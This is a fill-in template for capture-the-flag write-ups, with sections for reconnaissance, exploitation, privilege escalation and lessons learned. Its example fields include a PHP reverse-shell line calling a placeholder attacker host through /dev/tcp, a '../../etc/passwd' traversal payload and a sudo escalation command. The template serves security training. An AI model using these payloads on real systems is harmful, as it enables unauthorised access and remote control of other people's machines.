CTF Writeup
Event/Platform: [Hack The Box / TryHackMe / PicoCTF / Local Event]
Date Solved: [YYYY-MM-DD]
Category: [Web / Reverse Engineering / Pwn / Crypto / Forensics / Misc]
Difficulty: [Easy / Medium / Hard / Insane]
🔍 Initial Discovery and Reconnaissance
How did you first approach the problem?
- Target: [IP Address / URL / File Name]
- Initial Step: [e.g., "Ran Nmap scan on all ports."]
- Key Finding: [The one piece of information that pointed you in the right direction, e.g., "Discovered a hidden `.git` directory."]
Code Block Example (Nmap Output):
```
# nmap -sC -sV [IP]
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
```
🧩 Exploitation Path and Steps
Detail the logical sequence of steps that led to the flag. Break this down into smaller, digestible phases.
Phase 1: Finding the Vulnerability (e.g., Web App)
- Tool Used: [Burp Suite / Dirb / Nikto]
- Action: [e.g., "Fuzzing a parameter in the contact form."]
- Vulnerability Type: [e.g., Local File Inclusion (LFI)]
- Proof: [e.g., "The application returned the contents of `/etc/passwd` when the payload `../../etc/passwd` was injected."]
Phase 2: Gaining Access/Shell
- Technique: [e.g., "Used the LFI to access the log files and inject a PHP reverse shell."]
- Payload/Command:
```
<?php system("bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/[PORT] 0>&1'"); ?>
```
- Result: [e.g., "Successfully obtained a low-privilege shell as user `www-data`."]
Phase 3: Privilege Escalation (if necessary)
- Method: [e.g., Misconfigured SUID binary]
- Tool: [e.g., LinPEAS, manually checked `sudo -l`]
- Final Action: [Command used to escalate, e.g., `sudo /usr/bin/python3 /tmp/exploit.py`]
🏆 The Flag
Document the final steps and the flag itself.
- Location: [The file path or database table where the flag was found.]
- Flag Value: (Optional, often replaced with `[FLAG REDACTED]`) `FLAG{[REDACTED_EXAMPLE_FLAG]}`
🧠 Key Takeaway
What specific technical or problem-solving concept did this challenge reinforce?
- [e.g., "Reinforced the importance of manual code review, as automated tools missed the vulnerability."]
- [e.g., "Learned a new technique for exploiting deserialization flaws in Python."]